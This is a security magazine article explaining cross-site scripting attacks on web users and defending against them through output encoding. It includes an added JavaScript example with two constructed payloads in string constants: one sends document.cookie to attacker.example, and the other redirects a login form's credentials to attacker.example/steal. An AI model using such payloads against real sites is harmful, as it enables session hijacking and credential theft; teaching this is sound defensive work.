This article can also be found in the Premium Editorial Download "Information Security magazine: Special manager's guide: Monitoring identities."
Resources & Tools
Open Web Application Security Project (OWASP)
Web Application Security Consortium (WASC)
IIS Lockdown Tool
Google Webmasters FAQ
SANS Top 20 Vulnerabilities
Unlike many application-layer attacks, cross-site scripting (XSS) attacks target an application's users rather than its servers, often with the aim of stealing personal data. They affect any Web application that echoes untrusted input into pages that run script in the browser, and because the injected script executes with the victim's privileges, they can be used to indirectly compromise the application's infrastructure.
Most Web sites have numerous possible injection points, making them vulnerable to this attack method. And although client-side scripts cannot directly read or modify server-side data, an injected script runs in the victim's browser inside the victim's session and can still compromise a site's security, for example by altering form values or switching a form's action so that the submitted data is posted to the attacker's site. The most common purpose of XSS attacks, however, is to gather cookie data. Cookies are commonly, and often incorrectly, used to store information intended to persist during a browser session, or from session to session, such as session IDs, user preferences and login information. If input to your dynamically generated Web pages is not validated when it is received and encoded when it is published, you could fall prey to an XSS attack.
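The following is an added example, not code from the original article. It shows the mechanics described above on a constructed search page: a search term pasted straight into the HTML, the two kinds of payload the text mentions (cookie theft and a hijacked form action), the same page with HTML output encoding applied, and a session cookie flagged HttpOnly so that even a successful injection cannot read it through document.cookie. The page layout, the form id "login", the attacker.example URLs and the payloads are all assumptions made for the example; scriptBodies() is a stand-in for the browser's parser, used only to show which scripts the page would execute.

```javascript
// Added example (not from the original article). Names, URLs and payloads
// below are constructed for illustration.

// Vulnerable: the search term is concatenated into the page unchanged.
function renderSearchPageUnsafe(term) {
  return [
    "<h1>Results for " + term + "</h1>",
    '<form id="login" action="/login" method="post">',
    '  <input name="user"><input name="pass" type="password">',
    "</form>",
  ].join("\n");
}

// Hardened: encode the HTML metacharacters before the term is published.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderSearchPageSafe(term) {
  return renderSearchPageUnsafe(escapeHtml(term));
}

// Constructed payloads of the two kinds the article describes.
// 1. Send the victim's cookies to the attacker's host.
const COOKIE_THEFT =
  '<script>new Image().src="https://attacker.example/c?"' +
  "+encodeURIComponent(document.cookie)</script>";
// 2. Repoint the login form so submitted credentials go to the attacker.
//    (Runs on load because the form appears after the injection point.)
const FORM_HIJACK =
  '<script>addEventListener("load",function(){' +
  'document.getElementById("login").action="https://attacker.example/steal"' +
  "})</script>";

// Stand-in for the browser's parser: return the bodies of every <script>
// element the page would execute.
function scriptBodies(html) {
  const out = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Server side: an HttpOnly session cookie is never exposed through
// document.cookie, so the cookie-theft payload gets nothing useful.
function sessionCookieHeader(sessionId) {
  return (
    "sid=" + encodeURIComponent(sessionId) +
    "; Path=/; Secure; HttpOnly; SameSite=Lax"
  );
}

function demo() {
  const unsafeCookie = renderSearchPageUnsafe(COOKIE_THEFT);
  const unsafeForm = renderSearchPageUnsafe(FORM_HIJACK);
  const safe = renderSearchPageSafe(COOKIE_THEFT);
  return {
    cookieTheftScripts: scriptBodies(unsafeCookie),   // one script, reads document.cookie
    formHijackScripts: scriptBodies(unsafeForm),      // one script, rewrites form.action
    safePageScripts: scriptBodies(safe),              // none: payload is now inert text
    safePageStartsWith: safe.slice(0, 40),
    cookieHeader: sessionCookieHeader("3f9a-example"),
  };
}

console.log(demo());
```

Output encoding at the point of publication is what makes the payload inert; input validation on its own is a useful second layer but cannot anticipate every context the data will later be written into.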
This was first published in August 2006